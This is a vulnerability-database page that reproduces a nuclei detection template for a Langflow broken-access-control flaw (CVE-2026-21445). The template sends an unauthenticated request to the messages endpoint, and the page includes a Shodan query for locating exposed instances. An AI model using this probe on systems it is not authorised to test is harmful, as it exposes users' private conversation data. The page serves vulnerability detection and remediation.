Lucene search
K

Langflow - Broken Access Control

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Langflow permits unauthenticated access to data and destructive actions due to broken access control; update to 1.7.0.dev45+

Related
Refs
Code
id: CVE-2026-21445

info:
  name: Langflow - Broken Access Control
  author: DhiyaneshDk
  severity: critical
  description: |
    Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
  remediation: Update to version 1.7.0.dev45 or later.
  impact: |
    Unauthenticated attackers can access sensitive user data and perform destructive actions, risking data loss and privacy breaches.
  reference:
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21445
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-21445
    cwe-id: CWE-306
    epss-score: 0.20655
    epss-percentile: 0.97221
  metadata:
    verified: true
    max-request: 1
    vendor: langflow-ai
    product: langflow
    shodan-query: html:"Langflow"
  tags: cve,cve2026,langflow,auth-bypass,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/monitor/messages"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"text":'
          - '"timestamp":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a004630440220115f2bf7a894f21a3cfbc82b34fa25a990ef484b30a29589cf4eb0e70301b0820220661dc2c86e91233d1fa19f742e907b8172e0527d41f50f2a15f5dc87f72b6e67:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Mar 2026 06:06Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.1
CVSS 49.3
EPSS0.20655
SSVC
16